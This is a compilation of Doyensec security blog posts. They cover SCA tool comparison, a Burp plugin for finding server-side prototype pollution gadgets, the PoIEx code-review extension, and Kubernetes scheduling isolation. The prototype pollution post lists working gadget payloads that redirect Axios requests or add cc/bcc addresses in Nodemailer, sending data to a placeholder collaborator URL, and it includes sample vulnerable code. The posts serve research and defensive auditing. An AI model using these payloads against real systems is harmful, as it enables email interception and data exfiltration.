A Look at Software Composition Analysis

Software Supply Chain as a factory assembly line

Background

At Doyensec, we specialize in performing white and gray box application security audits. So, in addition to dynamically testing applications, we typically audit our clients’ source code as well. This process is often software-assisted, with open source and off-the-shelf tools. Modern comprehensive versions of these tools offer the capabilities to detect the inclusion of vulnerable third-party libraries, commonly referred to as software composition analysis (SCA).

Finding the right tool

Three well-known tools in the SCA space are Snyk, Semgrep and Dependabot. The first two are stand-alone applications, with cloud components to them and the last is integrated into the GitHub(.com) environment directly. Since Security Automation is one of our core competencies, Doyensec has extensive experience with these tools, from writing custom detection rules for Semgrep, to assisting clients with selecting and deploying these types of tools in their SDLC processes. We have also previously published research into some of these, with regards to their Static Analysis Security Testing (SAST) capabilities. You can find those results here. After discussing this research directly with Semgrep, we were asked to perform an unbiased head-to-head comparison of the SCA functionality of these tools as well.

It’s time to ignore most of dependency alerts.

You will find the results of this latest analysis here on our research page. Included in that whitepaper, we describe the process taken to develop the testing corpus and our methodology. In short, the aim was to determine which tool could provide the most actionable and efficient results (i.e., high true positive rates), regardless of the false negative rates. This scenario was thought to be the optimal real-world scenario for most security teams, because most can’t afford to routinely spend hours or days chasing false positives. The person-hours required to triage low fidelity tools in the hopes of an occasional true positive are simply too costly for all but the largest teams in the most secure environments. Additionally, any attempts at implementing deployment blocking as a result of CI/CD testing are unlikely to tolerate more than a minimal amount of false positives.

False Positive Rate

More to Come

We hope you find the whitepaper comparing the tools informative and useful. Please follow our blog for more posts on current trends and topics in the world of application security. If you would like assistance with your application security projects, including security automation services, feel free to contact us at info@doyensec.com.


Unveiling the Prototype Pollution Gadgets Finder

Introduction

Prototype pollution has recently emerged as a fashionable vulnerability within the realm of web security. This vulnerability occurs when an attacker exploits the nature of JavaScript’s prototype inheritance to modify a prototype of an object. By doing so, they can inject malicious code or alter an application to behave in unintended ways. This could potentially lead to sensitive information leakage, type confusion vulnerabilities, or even remote code execution, under certain conditions.

For those interested in diving deeper into the technicalities and impacts of prototype pollution, we recommend checking out PortSwigger’s comprehensive guide.

// Example of prototype pollution in a browser console
Object.prototype.isAdmin = true;
const user = {};
console.log(user.isAdmin); // Outputs: true

To fully understand the exploitation of this vulnerability, it’s crucial to know what “sources” and “gadgets” are.

  • Sources: A source in the context of prototype pollution refers to a piece of code that performs a recursive assignment without properly validating the objects involved. This action creates a pathway for attackers to modify the prototype of an object. The main sources of prototype pollution are:
    • Custom Code: This includes code written by developers that does not adequately check or sanitize user input before processing it. Such code can directly introduce vulnerabilities into an application.
    • Vulnerable Libraries: External libraries that contain vulnerabilities can also lead to prototype pollution. This often happens through recursive assignments that fail to validate the safety of the objects being merged or extended.
// Example of recursive assignment leading to prototype pollution
function merge(target, source) {
    for (let key in source) {
        if (typeof source[key] === 'object') {
            if (!target[key]) target[key] = {};
            merge(target[key], source[key]);
        } else {
            target[key] = source[key];
        }
    }
}
  • Gadgets: Gadgets refer to methods or pieces of code that exploit the prototype pollution vulnerability to achieve an attack. By manipulating the prototype of a base object, attackers can alter the application’s logic, gain unauthorized access, or execute arbitrary code, depending on the application’s structure and the nature of the polluted prototype.

State of the Art

Before diving into the specifics of our research, it’s crucial to understand the landscape of existing research on prototype pollution. This will help us identify the gaps in current methodologies and tools, and how our work aims to address them.

On the client side, there is a wealth of research and tools available. For sources, an excellent starting point is the compilation found on GitHub (client-side prototype pollution sources). As for gadgets, detailed exploration and exploitation techniques have been documented in various write-ups, such as this informative piece on InfoSec Writeups and PortSwigger’s own guide on client-side prototype pollution.

Additionally, there are tools designed to detect and exploit this vulnerability in an automated manner, both from the command line and within the browser. These include the PP-Finder CLI tool and DOM Invader, a feature of Burp Suite designed to uncover client-side prototype pollution.

However, the research and tooling landscape for server-side prototype pollution presents a different picture:

  • PortSwigger’s research provides a foundational understanding of server-side prototype pollution with various detection methodologies. However, a significant limitation is that some of these detection methods have become obsolete over time. More importantly, while it excels in identifying vulnerabilities, it does not extend to facilitating their real-world exploitation using gadgets. This gap indicates a need for tools that not only detect but also enable the practical exploitation of identified vulnerabilities.

  • On the other hand, YesWeHack’s guide introduces several intriguing gadgets, some of which have been incorporated into our plugin (below). Despite this valuable contribution, the guide occasionally ventures into hypothetical scenarios that may not always align with realistic application contexts. Moreover, it falls short of providing an automated approach for discovering gadgets in a black-box testing environment. This is crucial for comprehensive vulnerability assessments and exploitation in real-world settings.

This overview underscores the need for further innovation in server-side prototype pollution research, specifically in developing tools that not only detect but also exploit this vulnerability in a practical, automated manner.

About the Plugin

Following the insights previously discussed, we’ve developed a Burpsuite plugin for detecting gadgets in server-side prototype pollution: the Prototype Pollution Gadgets Finder, available at GitHub. This tool represents a novel approach in the realm of web security, focusing on the precise identification and exploitation of prototype pollution vulnerabilities.

The core functionality of this plugin is to take a JSON object from a request and systematically attempt to poison all possible fields with a predefined set of gadgets. For example, given a JSON object:

{
  "user": "example",
  "auth": false
}

The plugin would attempt various poisonings, such as:

{
  "user": {"__proto__": <polluted_object>},
  "auth": false
}

or:

{
  "user": "example",
  "auth": {"__proto__": <polluted_object>}
}

Our decision to create a new plugin, rather than relying solely on custom checks (bchecks) or the existing server-side prototype pollution scanner highlighted in PortSwigger’s blog, was driven by a practical necessity. These tools, while powerful in their detection capabilities, do not automatically revert the modifications made during the detection process. Given that some gadgets could adversely affect the system or alter application behavior, our plugin specifically addresses this issue by carefully removing the poisonings after their detection. This step is crucial to ensure that the exploitation process does not compromise the application’s functionality or stability. By taking this approach, we aim to provide a tool that not only identifies vulnerabilities but also maintains the integrity of the application by preventing potential disruptions caused by the exploitation activities.

Furthermore, all gadgets introduced by the plugin operate out-of-bounds (OOB). This design choice stems from the understanding that the source of pollution might be entirely separate from where a gadget is triggered within the application’s codebase. Therefore, the exploitation occurs asynchronously, relying on OOB techniques that wait for interaction. This method ensures that even if the polluted property is not immediately used, it can still be exploited, once the application interacts with the poisoned prototype. This showcases the versatility and depth of our scanning approach.

Plugin Screenshot

Methodology for Finding Gadgets

To discover gadgets capable of altering an application’s behavior, our approach involved a thorough examination of the documentation for common Node.js libraries. We focused on identifying optional parameters within these libraries that, when modified, could introduce security vulnerabilities or lead to unintended application behaviors. Part of our methodology also includes defining a standard format for describing each gadget within our plugin:

{
"payload": {"<parameter>": "<URL>"},
"description": "<Description>",
"null_payload": {"<parameter>": {}}
}
  • Payload: Represents the actual payload used to exploit the vulnerability. The <URL> placeholder is where the URL of the collaborator is inserted.
  • Description: Provides a brief explanation of what the gadget does or what vulnerability it exploits.
  • Null_payload: Specifies the payload that should be used to revert the changes made by the payload, effectively “de-poisoning” the application to prevent any unintended behavior.

This format ensures a consistent and clear way to document and share gadgets among the security community, facilitating the identification, testing, and mitigation of prototype pollution vulnerabilities.

Axios Library

Axios is widely used for making HTTP requests. By examining the Axios documentation and request configuration options, we identified that certain parameters, such as baseURL and proxy, can be exploited for malicious purposes.

  • Vulnerable Code Example:
    app.get("/get-api-key", async (req, res) => {
      try {
          const instance = axios.create({baseURL: "https://doyensec.com"});
          const response = await instance.get("/?api-key=<API_KEY>");
      }
    });
    
  • Gadget Explanation: Manipulating the baseURL parameter allows for the redirection of HTTP requests to a domain controlled by an attacker, potentially facilitating Server-Side Request Forgery (SSRF) or data exfiltration. For the proxy parameter, the key to exploitation lies in the ability to suggest that outgoing HTTP requests could be rerouted through an attacker-controlled proxy. While Burp Collaborator itself does not support acting as a proxy to directly capture or manipulate these requests, the subtle fact that it can detect DNS lookups initiated by the application is crucial. The ability to observe the DNS requests to domains we control, triggered by poisoning the proxy configuration, indicates the application’s acceptance of this poisoned configuration. It highlights the potential vulnerability without the need to directly observe proxy traffic. This insight allows us to infer that with the correct setup (outside of Burp Collaborator), an actual proxy could be deployed to intercept and manipulate HTTP communications fully, demonstrating the vulnerability’s potential exploitability.

  • Gadget for Axios:
    {
      "payload": {"baseURL": "https://<URL>"},
      "description": "Modifies 'baseURL', leading to SSRF or sensitive data exposure in libraries like Axios.",
      "null_payload": {"baseURL": {}}
    },
    {
      "payload": {"proxy": {"protocol": "http", "host": "<URL>", "port": 80}},
      "description": "Sets a proxy to manipulate or intercept HTTP requests, potentially revealing sensitive info.",
      "null_payload": {"proxy": {}}
    }
    

Nodemailer Library

Nodemailer is another library we explored and is primarily used for sending emails. The Nodemailer documentation reveals that parameters like cc and bcc can be exploited to intercept email communications.

  • Vulnerable Code Example:
    transporter.sendMail(mailOptions, (error, info) => {
      if (error) {
          res.status(500).send('500!');
      } else {
          res.send('200 OK');
      }
    });
    
  • Gadget Explanation: By adding ourselves as a cc or bcc recipient in the email configuration, we can potentially intercept all emails sent by the platform, gaining access to sensitive information or communication.

  • Gadget for Nodemailer:
    {
      "payload": {"cc": "email@<URL>"},
      "description": "Adds a CC address in email libraries, potentially intercepting all platform emails.",
      "null_payload": {"cc": {}}
    },
    {
      "payload": {"bcc": "email@<URL>"},
      "description": "Adds a BCC address in email libraries, similar to 'cc', for intercepting emails.",
      "null_payload": {"bcc": {}}
    }
    

Gadget Found

Our methodology emphasizes the importance of understanding library documentation and how optional parameters can be leveraged maliciously. We encourage the community to contribute by identifying new gadgets and sharing them. Visit our GitHub repository for a comprehensive installation guide and to start using the tool.


Introducing PoIEx - Points Of Intersection Explorer

We are releasing a previously internal-only tool to improve Infrastructure as Code (IaC) analysis and enhance Visual Studio Code allowing real-time collaboration during manual code analysis activities. We’re excited to announce that PoIEx is now available on Github.

Nowadays, cloud-oriented solutions are no longer a buzzword, cloud providers offer ever more intelligent infrastructure services, handling features ranging from simple object storage to complex tasks such as user authentication and identity access management. With the growing complexity of cloud infrastructure, the interactions between application logic and infrastructure begin to play a critical role in ensuring application security.

With many recent high-profile incidents resulting from an insecure combination of web and cloud related technologies, focusing on the points where they meet is crucial to discover new bugs.

PoIEx is a new Visual Studio Code extension that aids testers in analyzing interactions between code and infrastructure by enumerating, plotting and connecting the so called Points of Intersection.

Introducing the Point of Intersection - A novel approach to IaC-App analysis

A Point of Intersection (PoI) marks where the code interacts with the underlying cloud infrastructure, revealing connections between the implemented logic and the Infrastructure as Code (IaC) defining the configuration of the involved cloud services.

Enumerating PoIs is crucial while performing manual reviews to find hybrid cloud-web vulnerabilities exploitable by tricking the application logic into abusing the underlying infrastructure service.

PoIEx identifies and visualizes PoIs, allowing security engineers and cloud security specialists to better understand and identify security vulnerabilities in cloud-oriented applications.

PoIEx: Enhancing VSCode to support Code Reviews

PoIEx scans the application code and the IaC definition at the same time, leveraging Semgrep and custom rulesets, finds code sections that are IaC-relevant, and visualizes results in a nice and user-friendly view. Engineers can navigate the infrastructure diagram and quickly jump to the relevant application code sections where the selected infrastructure resource is used.

Example infrastructure diagram generation and PoIs exploration

If you use VSCode to audit large codebases you may have noticed that all of its features are tailored towards the needs of the developer community. At Doyensec we have solved this issue with PoiEx. The extension enhances VSCode with all the features required to efficiently perform code reviews, such as advanced collaboration capabilities, notes taking using the VS Code Comments API and integration with Semgrep, allowing it to be used also as a standalone Semgrep and project collaboration tool, without any of its IaC-specific features.

At Doyensec, we use PoIEx as a collaboration and review-enhancement tool.
Below we introduce the non-IaC related features, along with our use cases.

✍️ Notes Taking As Organized Threads

PoIEx adds commenting capabilities to VSCode. Users can place sticky notes to any code locations without editing the codebase.

At Doyensec, we usually organize threads with a naming convention involving prefixes like: VULN, LEAD, TODO, etc. We have found that placing shared annotations directly on the codebase greatly improves efficiency when multiple testers are working on the same project.

Example notes usage with organized threads

In collaboration mode, members receive an interactive notification for every reply or thread creation, enabling real-time sync among the reviewers about leads, notes and vulnerabilities.

👨‍💻 PoIEx as a standalone Semgrep extension for VSCode

PoIEx works also as a standalone VSCode extension for Semgrep. PoIEx allows the user to scan the entire workspace and presents Semgrep findings nicely in the VSCode “Problems” tab.

Moreover, by right-clicking the issue, it is possible to apply a flag and update its status as: ❌ false positive,🔥 Hot or ` ✅ resolved`. The status is synced in collaboration mode to avoid duplicating checks.

The extension settings allow the user to setup custom arguments for Semgrep. As an example we currently use --config /path/to/your/custom-semgrep-rules --metrics off to turn off metrics and set it use our custom rules.

The scan can be started from the extension side-menu and the results are explorable from the VS Code problems sub-menu. Users can use the built-in search functionality in a smart way to find interesting leads.

Example Semgrep results and listed PoIs exploration with emoji flagging

🎯 Project-oriented Design

PoIEx allows for real-time synchronization of findings and comments with other users. When using collaboration features, a MongoDB instance needs to be shared across all collaborators of the team.

The project-oriented design allows us to map projects and share an encryption key with the testers assigned to a specific activity. This design feature ensures that sensitive data is encrypted at rest.

Comments and scan results are synced to a MongoDB instance, while the codebase remains local and each reviewer must share the same version.

A Real-World Analysis Example - Solving Tidbits Ep.1 With PoIEx

In case you are not familiar with it, CloudSec Tidbits is our blogpost series showcasing interesting real-world bugs found by Doyensec during cloud security testing activities. The blog posts & labs can be found in this repository.

Episode 1 describes a specific type of vulnerability affecting the application logic when user-input is used to instantiate the AWS SDK client. Without proper checks, the user could be able to force the app to use the instance role, instead of external credentials, to interact with the AWS service. Depending on the functionality, such a flaw could allow unwanted actions against the internal infrastructure.

Below, we are covering the issue identification in a code review, as soon as the codebase is opened and explored with PoIEx.

Once downloaded and opened in VS Code, examine the codebase for Lab 1, by using PoIEx to run Semgrep and show the infrastructure diagram by selecting the main.tf file. The result should be similar to the following one.

The notifications on aws_s3_bucket.data_internal represent two findings for that bucket. By clicking on it, a new tab is opened to visualize them.

The first group contains PoIs and Semgrep findings, while the second group contains the IaC definition of the clicked entity.

In that case we see that there is an S3 PoI in app/web.go:52. Once clicked, we are redirected at the GetListObjects function defined at web.go#L50. While it is just listing the files in an S3 bucket, both the SDK client config and bucket name are passed as parameters in its signature.

A quick search for its usages will show the vulnerable code

//*aws config initialization
aws_config := &aws.Config{}

if len(imptdata.AccessKey) == 0 || len(imptdata.SecretKey) == 0 {
	fmt.Println("Using nil value for Credentials")
	aws_config.Credentials = nil
} else {
	fmt.Println("Using NewStaticCredentials")
	aws_config.Credentials = credentials.NewStaticCredentials(imptdata.AccessKey, imptdata.SecretKey, "")
}
//list of all objects
allObjects, err := GetListObjects(session_init, aws_config, *aws.String(imptdata.BucketName))

If the aws_config.Credentials is set to nilbecause of a missing key/secret in the input, the credentials provider chain will be used and the instance’s IAM role is assumed. In that case, the automatically retrieved credentials have full access to internal S3 buckets. Quickly jump to the TF definition from the S3 bucket results tab.

After the listing, the DownloadContent function is executed (at web.go line 129 ) and the bucket’s contents are exposed to the user.

At this point, the reviewer knows that if the function is called with an empty AWS Key or Secret, the import data functionality will end up downloading the content with the instance’s role, hence allowing internal bucket names as input.

To exploit the vulnerability, hit the endpoint /importData with empty credentials and the name of an internal bucket (solution at the beginning of Cloudsec Tidbits episode 2).

Stay Tuned!

This project was made with love on the Doyensec Research Island by Michele Lizzit for his master thesis at ETH Zurich under the mentoring of Francesco Lacerenza.

Check out PoIEx! Install the last release from GitHub and contribute with a star, bug reports or suggestions.


Kubernetes Scheduling And Secure Design

During testing activities, we usually analyze the design choices and context needs in order to suggest applicable remediations depending on the different Kubernetes deployment patterns. Scheduling is often overlooked in Kubernetes designs. Typically, various mechanisms take precedence, including, but not limited to, admission controllers, network policies, and RBAC configurations.

Nevertheless, a compromised pod could allow attackers to move laterally to other tenants running on the same Kubernetes node. Pod-escaping techniques or shared storage systems could be exploitable to achieve cross-tenant access despite the other security measures.

Having a security-oriented scheduling strategy can help to reduce the overall risk of workload compromise in a comprehensive security design. If critical workloads are separated at the scheduling decision, the blast radius of a compromised pod is reduced. By doing so, lateral movements related to the shared node, from low-risk tasks to business-critical workloads, are prevented.

CloudsecTidbit
Attackers on a compromised pod with nothing around

Kubernetes provides multiple mechanisms to achieve isolation-oriented designs like node tainting or affinity. Below, we describe the scheduling mechanisms offered by Kubernetes and highlight how they contribute to actionable risk reduction.

The following methods to apply a scheduling strategy will be discussed:

Mechanisms for Workloads Separation

As mentioned earlier, isolating tenant workloads from each other helps in reducing the impact of a compromised neighbor. That happens because all pods running on a certain node will belong to a single tenant. Consequently, an attacker capable of escaping from a container will only have access to the containers and the volumes mounted to that node.

Additionally, multiple applications with different authorizations may lead to privileged pods sharing the node with pods having PII data mounted or a different security risk level.

1. nodeSelector

Among the constraints, it is the simplest one operating by just specifying the target node labels inside the pod specification.

Example pod Spec

apiVersion: v1
kind: pod
metadata:
  name: nodeSelector-pod
spec:
  containers:
  - name: nginx
    image: nginx:latest
  nodeSelector:
    myLabel: myvalue

If multiple labels are specified, they are treated as required (AND logic), hence scheduling will happen only on pods respecting all of them.

While it is very useful in low-complexity environments, it could easily become a bottleneck stopping executions if many selectors are specified and not satisfied by nodes. Consequently, it requires good monitoring and dynamic management of the labels assigned to nodes if many constraints need to be applied.

2. nodeName

If the nodeName field in the Spec is set, the kube scheduler simply passes the pod to the kubelet, which then attempts to assign the pod to the specified node.

In that sense, nodeName overwrites other scheduling rules (e.g., nodeSelector,affinity, anti-affinity etc.) since the scheduling decision is pre-defined.

Example pod spec

apiVersion: v1
kind: pod
metadata:
  name: nginx
spec:
  containers:
  - name: nginx
    image: nginx:latest
  nodeName: node-critical-workload

Limitations:

  • The pod will not run if the node in the spec is not running or if it is out of resources to host it
  • Cloud environments like AWS’s EKS come with non predictable node names

Consequently, it requires a detailed management of the available nodes and allocated resources for each group of workloads since the scheduling is pre-defined.

Note: De-facto such an approach invalidates all the computational efficiency benefits of the scheduler and it should be only applied on small groups of critical workloads easy to manage.

3. Affinity & Anti-affinity

The NodeAffinity feature enables the possibility to specify rules for pod scheduling based on some characteristics or labels of nodes. They can be used to ensure that pods are scheduled onto nodes meeting specific requirements (affinity rules) or to avoid scheduling pods in specific environments (anti-affinity rules).

Affinity and anti-affinity rules can be set as either “preferred” (soft) or “required” (hard): If it’s set as preferredDuringSchedulingIgnoredDuringExecution, this indicates a soft rule. The scheduler will try to adhere to this rule, but may not always do so, especially if adhering to the rule would make scheduling impossible or challenging. If it’s set as requiredDuringSchedulingIgnoredDuringExecution, it’s a hard rule. The scheduler will not schedule the pod unless the condition is met. This can lead to a pod remaining unscheduled (pending) if the condition isn’t met.

In particular, anti-affinity rules could be leveraged to protect critical workloads from sharing the kubelet with non-critical ones. By doing so, the lack of computational optimization will not affect the entire node pool, but just a few instances that will contain business-critical units.

Example of node affinity

apiVersion: v1
kind: pod
metadata:
  name: node-affinity-example
spec:
  affinity:
   nodeAffinity:
      preferredDuringSchedulingIgnoredDuringExecution:
       - weight: 1
         preference:
          matchExpressions:
          - key: net-segment
            operator: In
            values:
            -  segment-x
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: workloadtype
            operator: In
            values:
            - p0wload
            - p1wload
  containers:
  - name: node-affinity-example
    image: registry.k8s.io/pause:2.0

The node is preferred to be in a specific network segment by label and it is required to match either a p0 or p1 workloadtype (custom strategy).

Multiple operators are available and NotIn and DoesNotExist are the specific ones usable to obtain node anti-affinity. From a security standpoint, only hard rules requiring the conditions to be respected matter. The preferredDuringSchedulingIgnoredDuringExecution configuration should be used for computational configurations that can not affect the security posture of the cluster.

4. Inter-pod Affinity and Anti-affinity

Inter-pod affinity and anti-affinity could constrain which nodes the pods can be scheduled on, based on the labels of pods already running on that node.
As specified in Kubernetes documentation:

“Inter-pod affinity and anti-affinity rules take the form “this pod should (or, in the case of anti-affinity, should not) run in an X if that X is already running one or more pods that meet rule Y”, where X is a topology domain like node, rack, cloud provider zone or region, or similar and Y is the rule Kubernetes tries to satisfy.”

Example of anti-affinity

affinity:
  podAntiAffinity:
    requiredDuringSchedulingIgnoredDuringExecution:
    - labelSelector:
        matchExpressions:
        - key: app
          operator: In
          values:
          - testdatabase

In the podAntiAffinity case above, we will never see the pod running on a node where a testdatabase app is running.

It fits designs where it is desired to schedule some pods together or where the system must ensure that certain pods are never going to be scheduled together. In particular, the inter-pod rules allow engineers to define additional constraints within the same execution context without further creating segmentation in terms of node groups. Nevertheless, complex affinity rules could create situations with pods stuck in pending status.

5. Taints and Tolerations

Taints are the opposite of node affinity properties since they allow a node to repel a set of pods not matching some tolerations. They can be applied to a node to make it repel pods unless they explicitly tolerate the taints.

Tolerations are applied to pods and they allow the scheduler to schedule pods with matching taints. It should be highlighted that while tolerations allow scheduling, the decision is not guaranteed.

Each node also defines an action linked to each taint: NoExecute (affects running pods), NoSchedule (hard rule), PreferNoSchedule (soft rule). The approach is ideal for environments where strong isolation of workloads is required. Moreover, it allows the creation of custom node selection rules not based solely on labels and it does not leave flexibility.

6. Pod Topology Spread Constraints

You can use topology spread constraints to control how pods are spread across your cluster among failure-domains such as regions, zones, nodes, and other user-defined topology domains. This can help to achieve high availability as well as efficient resource utilization.

7. Not Satisfied? Custom Scheduler to the Rescue

Kubernetes by default uses the kube-scheduler which follows its own set of criteria for scheduling pods. While the default scheduler is versatile and offers a lot of options, there might be specific security requirements that the default scheduler might not know about. Writing a custom scheduler allows an organization to apply a risk-based scheduling to avoid pairing privileged pods with pods processing or accessing sensitive data.

To create a custom scheduler, you would typically write a program that:

  • Watches for unscheduled pods
  • Implements a scheduling algorithm to decide on which node the pod should run
  • Communicates the decision to the Kubernetes API server.

Some examples of a custom scheduler that can be adapted for this can be found at the following GH repositories: kubernetes-sigs/scheduler-plugins or onuryilmaz/k8s-scheduler-example.
Additionally, a good presentation on crafting your own is Building a Kubernetes Scheduler using Custom Metrics - Mateo Burillo, Sysdig. As mentioned in the talk, this is not for the faint of heart because of the complexity and you might be better off just sticking with the default one if you are not already planning to build one.

Offensive Tips: Scheduling Policies are like Magnets

As described, scheduling policies could be used to attract or repel pods into specific group of nodes.

While a proper strategy reduces the blast radius of a compromised pod, there are still some aspects to take care of from the attacker perspective. In specific cases, the implemented mechanisms could be used either to:

  • Attract critical pods - A compromised node or role able to edit the metadata could be abused to attract pods, which are interesting to the attacker, by manipulating the labels of a controlled node.
    • Carefully review roles and internal processes that could be abused to edit the metadata. Verify the possibility for internal threats to exploit the attraction by influencing or changing the labels and taints
  • Avoid rejection on critical nodes - If users are supposed to submit pod specs or have indirect control over how they are dynamically structured, this could be abused with scheduling sections. An attacker able to submit pod Specs could use scheduling preferences to jump to a critical node.
    • Always review the scheduling strategy to find out the options allowing pods to land on nodes hosting critical workloads. Verify if the user-controlled flows allow adding them or if the logic could be abused by some internal flow
  • Prevent other workloads from being scheduled - In some cases, knowing or reversing the applied strategy could allow a privileged attacker to craft pods to block legitimate workloads at the scheduling decision.
    • Look for a potential mix of labels usable to lock the scheduling on a node

Bonus Section: Node labels security
Normally, the kubelet will still be able to modify labels for a node, potentially allowing a compromised node to tamper with its own labels to trick the scheduler as described above.

A security measure could be applied with the NodeRestriction admission plugin. It basically denies labels editing from the kubelet if the node-restriction.kubernetes.io/ prefix is present in the label.

Wrap-up: Time to Make the Scheduling Decision

Security-wise, dedicated nodes for each namespace/service would constitute the best setup. However, the design would not exploit the Kubernetes capability to optimize computations.

The following examples represent some trade-off choices:

  • Isolate critical namespaces/workloads on their own node group
  • Reserve a node for critical pods of each namespace
  • Deploy a completely independent cluster for critical namespaces

The core concept for a successful approach is having a set of reserved nodes for critical namespaces/workloads. Real world scenarios and complex designs require engineers to plan the fitting mix of mechanisms according to performance requirements and risk tolerance.

This decision starts with defining the workloads’ risks:

  • Different teams, different trust level
    It’s not uncommon for large organizations to have multiple teams deploying to the same cluster. Different teams might have different levels of trustworthiness, training or access. This diversity can introduce varying levels of risks.

  • Data being processed or stored
    Some pods may require mounting customer data or having persistent secrets to perform tasks. Sharing the node with any workload with less hardened workloads may expose the data to a risk

  • Exposed network services on the same node
    Any pod that exposes a network service increases its attack surface. pods interacting with external-facing requests may suffer from this exposure and be more at risk of compromise.

  • pod privileges and capabilities, or its assigned risk
    Some workloads may need some privileges to work or may run code that by its very nature processes potentially unsafe content or third-party vendor code. All these factors can contribute to increasing a workload’s assigned risk.

Once the set of risks within the environment are found, decide the isolation level for teams/data/network traffic/capabilities. Grouping them, if they are part of the same process, could do the trick.

At that point, the amount of workloads in each isolation group should be evaluable and ready to be addressed by mixing the scheduling strategies, according to the size and complexity of each group.

Note: Simple environments should use simple strategies and avoid mixing too many mechanisms if few isolation groups and constraints are present.